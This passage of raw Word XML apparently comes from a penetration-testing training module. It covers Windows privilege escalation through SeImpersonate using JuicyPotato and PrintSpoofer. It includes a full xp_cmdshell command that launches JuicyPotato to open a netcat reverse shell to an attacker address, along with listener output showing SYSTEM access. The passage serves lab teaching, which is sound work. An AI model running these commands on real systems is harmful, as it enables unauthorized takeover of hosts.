        <w:t xml:space="preserve"> is listed. This privilege can be used to impersonate a privileged account such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00291DE9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>JuicyPotato</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to exploit the </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>SeImpersonate</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>SeAssignPrimaryToken</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> privileges via DCOM/NTLM reflection abuse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3741609D" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">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91DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Escalating Privileges Using JuicyPotato</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62242C7E"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To escalate privileges using these rights, let's first download the </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>JuicyPotato.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> binary and upload this and </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>nc.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the target server. Next, stand up a Netcat listener on port 8443, and execute the command below where </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>-l</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the COM server listening port, </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>-p</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the program to launch (cmd.exe), </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>-a</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the argument passed to cmd.exe, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>-t</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>createprocess</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> call. Below, we are telling the tool to try both the </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00291DE9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>CreateProcessWithTokenW</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00291DE9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>CreateProcessAsUser</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> functions, which need </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>SeImpersonate</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>SeAssignPrimaryToken</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> privileges respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CBC63A" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">
      <w:pPr>
        <w:spacing w:after="0"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Escalating Privileges Using JuicyPotato </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44805A7D"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SQL&gt; xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1C48D4"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7229134"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output                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64296DD3"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467341C"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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2646E4B3"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8C0684B"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Testing {4991d34b-80a1-4291-83b6-3328366b9097} 53375                               </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586DC0BD"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                                            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0587F50B"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 authresult 0                                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD06D6E"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{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM                                                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1602E4EA"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 CreateProcessWithTokenW OK                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08149138"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calling 0x000000000088ce08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1813CB44" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">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91DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Catching SYSTEM Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A69B2D7"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This completes successfully, and a shell as </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is received.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FEB25A" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">
      <w:pPr>
        <w:spacing w:after="0"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Catching SYSTEM Shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0D1523"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yovecio@htb[/htb]$ sudo nc -lnvp 8443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F0D5E1"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749DD73"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listening on [any] 8443 ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C14DE9"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connect to [10.10.14.3] from (UNKNOWN) [10.129.43.30] 50332</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD6A1EA"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Microsoft Windows [Version 10.0.14393]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0E3F4F"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(c) 2016 Microsoft Corporation. All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139FA779"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EE88467"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92C4D24"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C:\Windows\system32&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6398434E"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35AF062"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whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C4D2C4"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nt authority\system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D68A03"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87962A5"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3CA0759"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C:\Windows\system32&gt;hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788885AB"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87CF4FF"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hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCFA87C"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WINLPE-SRV01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257F92B0" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">
      <w:pPr>
        <w:spacing w:after="0"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pict w14:anchorId="66E06C4B">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2B2429" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">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291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>PrintSpoofer and RoguePotato</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5416F18A"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JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards. However, </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00291DE9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>PrintSpoofer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00291DE9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>RoguePotato</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to leverage the same privileges and gain </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> level access. This </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00291DE9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>blog post</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> goes in-depth on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>PrintSpoofer</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3D2143" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">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91DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Escalating Privileges using PrintSpoofer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3731D0EC"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Let's try this out using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>PrintSpoofer</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool. We can use the tool to spawn a SYSTEM process in your current console and interact with it, spawn a SYSTEM process on a desktop (if logged on locally or via RDP), or catch a reverse shell - which we will do in our example. Again, connect with </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>mssqlclient.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and use the tool with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>-c</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
